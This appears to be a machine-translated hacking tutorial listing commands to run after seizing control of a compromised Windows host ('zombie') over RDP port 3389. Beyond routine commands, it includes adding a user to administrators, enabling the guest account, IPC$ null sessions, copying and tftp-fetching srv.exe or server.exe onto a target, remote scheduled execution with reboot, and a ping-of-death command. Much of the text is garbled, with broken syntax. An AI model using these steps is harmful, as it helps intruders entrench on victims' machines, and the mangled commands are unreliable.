3389 command highlights

Many new users don't know what to do after they get a zombie. So today, I will share with you some frequently used commands after getting a zombie with 3389 every day, hoping to be useful to you.
You can find a zombie to practice.

Net use $ "> // ip/ipc $ Content $ nbsp;" "/user:" "Create an empty IPC Link
Net use $ "> // ip/ipc $ Content $ nbsp;" password "/user:" user Name "creates a non-empty IPC Link
Net use h: $ "> // ip/c $ Content $ nbsp;" password "/user:" user Name ". After you log in directly, map the other party C: H to the local device:
Net use h: $ "> // ip/c $ Content $ nbsp; after login, map the other party C: to the local host H:
Net use $ "> // ip/ipc $ Content $ nbsp;/del Delete the IPC Link
. Net use h:/del: Delete the H ing from the ing peer to the local host that is h:
Net user username and password/add create user
Net user guest/active: yes to activate the guest user
. Net user.
Net user account name view account attributes
Net localgroup administrators user name/add the "user" to the administrator so that it has administrator permissions. Note: add s to the administrator and use the plural
Net start to check which services are enabled
. Net start service name. (For example, net start telnet and net start schedule)
Net stop service name to stop a service
Net time // view the target ip address's time
Net time // the destination ip address/set sets the time synchronization between the local computer time and the "Destination IP" host. The parameter/yes can be used to cancel the confirmation.
. Net view.
Net view // ip address to view which shares are enabled in the Peer LAN
Net config display system network settings
. Net logoff disconnection sharing
. Net pause service name: suspend a service
Net send ip "Text Information" to send information to the recipient
Network Connection type and information being used in the net ver LAN
. Net share
Net share ipc $ Content $ nbsp; Enable ipc $ share
Net share ipc $ Content $ nbsp;/del Delete ipc $ share
Net share c $ Content $ nbsp;/del Delete C: share
Net user guest 12345 after logging in with the guest user, change the password to 12345
Net password Change System Login password
Netstat-a is usually used to check which ports are enabled.
Netstat-n is commonly used to view the network connection of a port.
Netstat-V view ongoing work
Netstat-P protocol name example: netstat-p tcq/IP to view the usage of a protocol (view the usage of TCP/IP protocol)
Netstat-S: view all protocol usage in use
If an nbtstat-a ip address is enabled on one of the ports from 136 to 139, you can view the user name that the other party recently logged on to (the user name is before 03). Note: Parameter-A must be capitalized.
Tracert-parameter IP (or computer name) Tracking routing (packet), parameter: "-W number" is used to set the timeout interval.
Ping An IP address (or domain name) to send 32-byte data to the host. Parameter: "-l [space] data packet size"; "-N data transmission count "; "-T" indicates that the Ping is always performed.
Ping-T-l 65550 IP address death Ping (send a file larger than 64 KB and ping it until the ping ends)
Ipconfig (winipcfg) is used for Windows NT and XP (Windows 95 98) to view the local IP address. The "/all" parameter of ipconfig shows all configuration information.
Tlist-T displays processes in the tree line list (this is an additional system tool, which is not installed by default and is in the support/tools folder of the installation directory)
After the kill-f process name is added with the-F parameter, a process is forcibly terminated. (This is an additional tool of the system. It is not installed by default. It is in the support/tools folder of the installation directory)
After the Del-F file name and the-F parameter are added, the read-only files can be deleted./AR,/AH,/As, And/AA respectively indicate the deletion of read-only, hidden, system, and archive files, /A-R,/a-h,/a-s,/A-A means to delete files except read-only, hidden, system, archive. For example, "del/AR *. *" means to delete all read-only files in the current directory, "del/A-S *. *" means to delete all files except system files in the current directory
Del/S/Q directory or use: rmdir/s/Q directory/S to delete all subdirectories and files in the directory. At the same time, you can use the parameter/Q to cancel the deletion operation and then delete it directly. (The two commands serve the same purpose)
Move drive letter/path/file name to be moved to store the path of the mobile file/move the file name to move the file, use the parameter/y to cancel the confirmation that the Mobile Directory contains the same file and directly overwrite it
Fc one.txt two.txt> 3st.txt compares two files and outputs them to the 3st.txt file. ">" and ">" are redirection commands.
At ID: Enable a registered scheduled task
At/delete: stops all scheduled tasks. Use the/yes parameter to stop the tasks without confirmation.
At ID/delete: Stop a registered scheduled task
At view all scheduled tasks
At // ip time program name (or a command)/r runs a program of the other party at a certain time and restarts the computer
Finger username @ host
Telnet ip port: Remote and login server, default port: 23
Connecting an open ip address to an IP address (the command after telnet logon)
Telnet directly type telnet on the local machine to enter the local telnet
Copy path/file name 1 path/file name 2/y copy file 1 to the specified directory as file 2, use the/y parameter to cancel the confirmation at the same time you want to rewrite an existing directory file
Copy c:/srv.exe $ "> // ip/admin $ Content $ nbsp; copy local c:/srv.exe to the admin of the other party
Cppy 1st.jpg/b4242st.txt/a 3st.jpg contains a new file. Note: The 2st.txt File Header must be empty in three rows. Parameter:/B indicates the binary file, And/a indicates the ASCLL file.
Copy $/svv.exe "> // ip/admin $/svv.exe c: // or: copy // ip/admin $/*. * copy the srv.exe file (all files) shared by the peer administrator to the local C:
The target address/directory name of the file or directory tree to be copied in xcopy. copy the file and directory tree without prompting to overwrite the same file with the parameter/Y.
After you get server.exe c:/server.exe and log on to the target host, download the server.exe of the specified IP address to the parameter c:/server.exe of the target host: -I refers to binary transfer, which is used for transferring exe files. If-I is not added, it is transmitted in ASCII mode (Transfer text file mode ).
After logging on to the tftp-I peer IP put c:/server.exe, upload local c:/server.exe to the host
The ftp ip port is used to upload files to the server or perform file operations. The default port is 21. Bin refers to binary transfer (executable files). The default value is ASCII transfer (for text files)

Route print displays the IP route. The Network address Network addres, subnet mask Netmask, Gateway address addres, and Interface address are displayed.
Arp is used to view and process ARP caches. ARP is used to resolve an IP address into a physical MAC address. Arp-a displays all information
Start program name or command/max or/min open a new window and maximize (minimize) run a program or command
Mem view cpu usage
Attrib file name (directory name) to view the attributes of a file (directory)
Attrib file name-A-R-S-H or + A + R + S + H remove (ADD) the archive of A file, read-only, system, and hidden attribute; use + to add an attribute
Dir: view the file. The parameter "/Q" indicates the user of the file and directory system./T: C indicates the file creation time./T: A indicates the last file access time./T: w. last modification time
Date/t, time/t use this parameter, that is, "DATE/T", "TIME/T" will only display the current date and time, without entering a new DATE and TIME
Set specifies the environment variable name = the character to be assigned to the variable to set the environment variable
Set displays all current environment variables
Set p (or other characters) displays all environment variables starting with p (or other characters ).
Pause Suspends the batch processing program and displays: press any key to continue.
If execute condition processing in the batch processing program (for more information, see if command and variable)
The goto tag directs cmd.exe to the rows with labels in the batch processing program (the tag must be a separate row and headers with colons, for example, the ": start" tag)
Call path/batch processing file name call another batch processing program from the batch processing program (for more information, see call /?)
For execution of a specific command on each file in a group of files (for more information, see for command and variable)
Echo on or off enables or disables echo. The current echo settings are displayed only when echo is used without parameters.
Echo information is displayed on the screen
Echo information> pass.txt: Save "information" to the pass.txt File
Findstr "Hello" aa.txt search for the string hello in the aa.txt File
Find file name to find a file
Title name change the title name of the CMD window
Set the color value to the foreground and background colors of the cmd console; 0 = Black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = light blue, A = light green, B = light green, C = light red, D = light purple, E = light yellow, F = light white
The prompt name is changed to the command prompt displayed by cmd.exe (Change C: // and D:/to EntSky /)
Print file name print text file
Ver displays version information in the DOS window
In the winver pop-up window, the version information (memory size, system version, patch version, and computer name) is displayed)
Format drive letter/FS: Type Format disk, type: FAT, FAT32, NTFS, for example: format D:/FS: NTFS
Md directory name create directory
Replace the directory of the source file to be replaced
Rename original file name New File Name
Tree displays the directory in a tree structure, and uses the-f parameter to list the file names in the first folder.
Type file name display text file content
More file names display output files on screen
Doskey command to be locked = character
Doskey UNLOCK command = Lock Command provided for DOS (edit command line, re-call win2k command, and create macro ). For example, run the following command to lock the dir: doskey dir = entsky (doskey dir = dir cannot be used); unlock: doskey dir =
Taskmgr call up the Task Manager
Chkdsk/f d: Check disk D and display status report; add parameter/f and fix disk errors
Tlntadmn telnt service admn, type tlntadmn to select 3, and then select 8, you can change telnet service default port 23 to any other port
Exit to exit the cmd.exe program. Currently, the parameter/B is used to exit the current batch processing script, not cmd.exe.
Path/the file name of the executable file sets a path for the executable file.
Cmd starts a Windows 2 K Command explanation window. Parameters:/eff,/en, and enable command extension. For more information, see cmd /?
Regedit/s registry file name import to registry; parameter/S indicates quiet mode import, no prompt;
Regedit/e registry file name export Registry
Cacls file name parameters display or modify the file access control list (ACL)-for NTFS format. Parameter:/D User name: Set to deny access to a user;/P User name: perm to replace the access permission of the specified user;/G User name: perm to grant the access permission to the specified user; Perm can be: N none, R read, W write, C Change (write), F full control; for example: cacls D:/test.txt/D pub set d:/test.txt to reject pub user access.
Cacls file name to view the object access user permission list
Add annotation to the batch file for REM text content
Netsh to view or change the local network configuration
IIS service command:
Iisreset/reboot restart win2k computer (but a message is prompted that the system will restart)
Iisreset/start or stop all Internet services
Iisreset/restart stop and restart all Internet services
Iisreset/status displays the status of all Internet services
Enable or disable Internet service restart on the local system
Iisreset/rebootonerror when the Internet service is started, stopped, or restarted, the system restarts if an error occurs.
Iisreset/noforce: if the Internet service cannot be stopped, the Internet service will not be forcibly terminated.
Iisreset/timeout Val does not stop the Internet service when it reaches the time (in seconds). If the/rebootonerror parameter is specified, the computer restarts. The default value is restart for 20 seconds, stop for 60 seconds, and restart for 0 seconds.
FTP command: (details are provided later)
The ftp command line format is:
Ftp-v-d-I-n-g [host name]-v displays all the response information of the remote server.
-D. Use the debugging method.
-N restrict ftp automatic logon, that is, the. netrc file is not used.
-G cancels the global file name.
Help [command] or? [Command] view command instructions
Bye or quit terminates the FTP process on the host and exits FTP management.
Pwd list the current remote host directory
Put or send local file name [file name uploaded to the host] transfers a local file to the remote host
Get or recv [remote host file name] [download to local file name] transfer from remote host to local host
Mget [remote-files] receives a batch of files from the remote host to the local host.
Mput local-files transfers a batch of files from the local host to the remote host
Dir or ls [remote-directory] [local-file] to list files in the directory of the current remote host. If a local file exists, write the result to the local file.
Ascii settings transfer files in ASCII mode (default)
Bin or image sets File Transfer in binary mode
Bell sends an alarm every time a file is transferred.
Cdup returns to the upper-level directory
Close interrupts the ftp session with the remote server (corresponds to open)
Open host [port] To establish a connection to the specified ftp server. You can specify the connection port.
Delete files from the remote host
Mdelete [remote-files] deletes a batch of files
Mkdir directory-name: create a directory in the remote host
RENAME [from] [to] Change the file name in the remote host
Rmdir directory-Name: Delete the directory in the remote host
Status: displays the status of the current FTP
System displays the remote host system type
User user-name [Password] [account] log on to the remote host with another user name
Open host [port] re-establishes a new connection
Prompt interaction prompt Mode
Macdef macro commands
The LCD changes the working directory of the current local host. If it is set to default, it is transferred to the Home Directory of the current user.
Chmod changes the File Permission of the remote host
When the case is on, use the mget command to copy the file name to the local machine, convert all to lowercase letters
CD remote-Dir: Enter the remote host directory
Cdup enters the parent directory of the remote host directory
! Execute the interactive shell on the local machine and exit to return to the FTP environment, such! Ls *. Zip
MySQL command:
Mysql-H host address-u user name-P password to connect to MySQL; If MySQL is just installed, the Super User Root has no password.
(For example, MySQL-h110.110.110.110-uroot-p123456)
Note: U and root do not need to add spaces. The same applies to others)
Exit to exit MySQL
Mysqladmin-u username-P old Password New Password Change Password
Grant select on database. * To username @ login host identified by/"password/"; Add new users. (Note: Unlike the above, the following commands in the MySQL environment are followed by a semicolon as the command Terminator)
Show databases; displays the Database List. At the beginning, there were only two databases: MySQL and test. The MySQL database contains the MySQL system information. We change the password and add new users to use this database for operations.
Whether the content is complete or not. I believe that everyone will find a sense of accomplishment! Finally, I would like to remind you not to do the most illegal thing!